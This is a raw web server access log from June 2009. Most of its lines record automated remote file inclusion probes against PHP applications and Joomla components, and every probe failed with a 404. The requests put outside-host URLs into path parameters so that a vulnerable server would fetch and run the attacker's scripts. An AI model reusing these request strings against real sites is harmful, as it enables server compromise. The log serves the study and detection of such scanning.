64.6.232.171 - - [28/Jun/2009:08:23:32 -0400] "GET /logs/access_log.Q109061600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
64.6.232.171 - - [28/Jun/2009:08:23:32 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://67.222.48.109/images/.ray/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:08:25:45 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.27.203.107 - - [28/Jun/2009:08:27:40 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:27:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [28/Jun/2009:08:28:43 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:43 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:43 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:08:28:48 -0400] "GET /logs/access_log.Q109051900//board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:08:28:48 -0400] "GET /logs//board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.206.120.187 - - [28/Jun/2009:08:28:48 -0400] "GET //board/outlogin.php?_zb_path=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:50 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:50 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:50 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:50 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:51 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:08:28:52 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:28:52 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:28:52 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:28:52 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:28:59 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:28:59 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:28:59 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:00 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:00 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:08 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:08 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
63.223.85.28 - - [28/Jun/2009:08:29:08 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:08:30:39 -0400] "GET /logs/access_log.Q109052700//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:32:12 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:32:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.204 - - [28/Jun/2009:08:34:06 -0400] "GET /logs/access_log.Q107111700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.86.9.234 - - [28/Jun/2009:08:36:00 -0400] "GET /logs/access_log.Q109061600//admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Jun/2009:08:36:47 -0400] "GET /logs//cross.php?url=http://for.caucasus.net/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:08:36:47 -0400] "GET //cross.php?url=http://for.caucasus.net/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:08:36:52 -0400] "GET /logs/access_log.Q109060400//cross.php?url=http://for.caucasus.net/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:08:37:16 -0400] "GET /logs/access_log.Q109053100//cross.php?url=http://for.caucasus.net/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
151.1.219.156 - - [28/Jun/2009:08:37:44 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:37:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.88.49.10 - - [28/Jun/2009:08:39:26 -0400] "GET /include.php?w=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
81.88.49.10 - - [28/Jun/2009:08:39:26 -0400] "GET /logs/include.php?w=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
81.88.49.10 - - [28/Jun/2009:08:39:26 -0400] "GET /logs/access_log.Q109051200%20%20/include.php?w=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:08:39:39 -0400] "GET /logs/access_log.Q108060700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.179 - - [28/Jun/2009:08:40:27 -0400] "GET /logs/access_log.Q109013000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.13.191.186 - - [28/Jun/2009:08:42:37 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:37 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:37 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:37 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:44 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:44 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:44 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:42:44 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:42:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [28/Jun/2009:08:42:48 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:48 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:48 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:52 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:52 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:52 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:54 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:42:57 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:43:57 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.243.139.4 - - [28/Jun/2009:08:43:57 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
193.243.139.4 - - [28/Jun/2009:08:43:57 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
217.147.29.190 - - [28/Jun/2009:08:44:52 -0400] "GET /logs/access_log.Q109061200//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:44:52 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:44:52 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:44:52 -0400] "GET /logs/access_log.Q109051900//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
193.243.139.4 - - [28/Jun/2009:08:45:14 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:08:45:14 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:08:45:14 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.243.139.4 - - [28/Jun/2009:08:45:15 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
194.30.168.194 - - [28/Jun/2009:08:45:25 -0400] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
194.30.168.194 - - [28/Jun/2009:08:45:25 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
194.30.168.194 - - [28/Jun/2009:08:45:25 -0400] "GET /logs/access_log.Q109051800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
194.30.168.194 - - [28/Jun/2009:08:45:26 -0400] "GET /logs/access_log.Q109061600/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:00 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:00 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:08:46:08 -0400] "GET /logs/access_log.Q108101100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.246.98.115 - - [28/Jun/2009:08:46:13 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:13 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:14 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:14 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:14 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:14 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
83.13.191.186 - - [28/Jun/2009:08:46:28 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:28 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:46:47 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:46:47 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
83.13.191.186 - - [28/Jun/2009:08:46:56 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:56 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:56 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:46:56 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.246.98.115 - - [28/Jun/2009:08:47:21 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
216.246.98.115 - - [28/Jun/2009:08:47:21 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
217.147.29.190 - - [28/Jun/2009:08:47:30 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:08:47:30 -0400] "GET /logs/access_log.Q109051900%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
81.88.49.10 - - [28/Jun/2009:08:47:32 -0400] "GET /logs/access_log.Q109051200/include.php?w=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:08:47:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.16 - - [28/Jun/2009:08:48:04 -0400] "GET /images/items/0531037_full.jpg HTTP/1.1" 200 13081 "-" "Googlebot-Image/1.0"
193.243.139.4 - - [28/Jun/2009:08:48:29 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
194.30.168.194 - - [28/Jun/2009:08:48:35 -0400] "GET /logs/access_log.Q109051800%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
194.30.168.194 - - [28/Jun/2009:08:48:35 -0400] "GET /logs/access_log.Q109061600%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:48:42 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:48:42 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:48:42 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:08:48:51 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:48:59 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [28/Jun/2009:08:49:12 -0400] "GET /logs/access_log.Q109061700%20%20/modules/My_eGallery/index.php?basepath=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
38.117.93.134 - - [28/Jun/2009:08:51:15 -0400] "GET /logs/access_log.Q109051000//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:51:15 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:51:15 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
38.117.93.134 - - [28/Jun/2009:08:51:27 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /logs/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /logs/access_log.Q109061600/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [28/Jun/2009:08:51:59 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:08:52:01 -0400] "GET /images/items/ HTTP/1.0" 200 79891 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [28/Jun/2009:08:52:03 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.103.48.109 - - [28/Jun/2009:08:52:09 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:52:09 -0400] "GET /logs/access_log.Q109051600%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:52:13 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
38.103.48.109 - - [28/Jun/2009:08:52:13 -0400] "GET /logs/access_log.Q109052700%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
